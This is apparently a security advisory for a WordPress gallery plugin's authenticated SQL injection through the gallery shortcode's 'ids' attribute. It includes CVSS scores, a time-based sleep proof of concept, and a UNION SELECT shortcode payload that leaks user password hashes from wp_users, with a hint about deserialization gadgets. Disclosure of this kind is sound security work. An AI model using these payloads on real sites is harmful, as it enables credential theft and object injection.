8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
5.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:P/A:N
The plugin does not sanitise, validate or escape the ids attribute of its gallery shortcode (available for users as low as Contributor) before using it in an SQL statement, leading to an authenticated SQL Injection issue. The injection also allows the returned values to be manipulated in a way that could lead to data disclosure and arbitrary objects to be deserialized.
Simple PoC to prove the SQLi: add the following shortcode in a page/post with a role as low as contributor, then preview/view it and note the 10s delay
[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]
-- Reporter PoC:
This SQL injection allows two things: 1) disclosure of arbitrary contents in SQL tables, and 2) deserialization of arbitrary objects.
To prepare for data disclosure, we first need to get serialized version of _wp_attachment_metadata. Of course if you are here for deserialization this can be replaced with serialization gadgets.
This is the JSON I used for this:
{"width":1,"height":1,"file":"a.png","sizes":{"medium":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"},"thumbnail":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0","keywords":[]}}
b64 = eyJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJmaWxlIjoiYS5wbmciLCJzaXplcyI6eyJtZWRpdW0iOnsiZmlsZSI6ImEucG5nIiwid2lkdGgiOjEsImhlaWdodCI6MSwibWltZS10eXBlIjoiaW1hZ2UvcG5nIn0sInRodW1ibmFpbCI6eyJmaWxlIjoiYS5wbmciLCJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJtaW1lLXR5cGUiOiJpbWFnZS9wbmcifX0sImltYWdlX21ldGEiOnsiYXBlcnR1cmUiOiIwIiwiY3JlZGl0IjoiIiwiY2FtZXJhIjoiIiwiY2FwdGlvbiI6IiIsImNyZWF0ZWRfdGltZXN0YW1wIjoiMCIsImNvcHlyaWdodCI6IiIsImZvY2FsX2xlbmd0aCI6IjAiLCJpc28iOiIwIiwic2h1dHRlcl9zcGVlZCI6IjAiLCJ0aXRsZSI6IiIsIm9yaWVudGF0aW9uIjoiMCIsImtleXdvcmRzIjpbXX19
Which can be base64_encode(serialize(json_decode(PAYLOAD))) ed to get the serialized payload.
Shortcode payload for leaking user's password hashes:
[gallery layout="cascade" ids="1) UNION SELECT id,user_pass,FROM_BASE64('BASE64ED_PAYLOAD_SEE_ABOVE') FROM wp_users WHERE id IN (1,2,3,4"]
This should produce a HTML like (base64ed):
<div class="mgl-row mgl-layout-1-o" data-cascade-layout="o"><div class="mgl-box a"><figure class="mgl-item">
<div class="mgl-icon">
<div class="mgl-img-container">
</div>
</div>
<figcaption class="mgl-caption">
<p>LEAKED PASSWORD HASH/</p>
</figcaption>
</figure>
</div></div>
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
5.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:P/A:N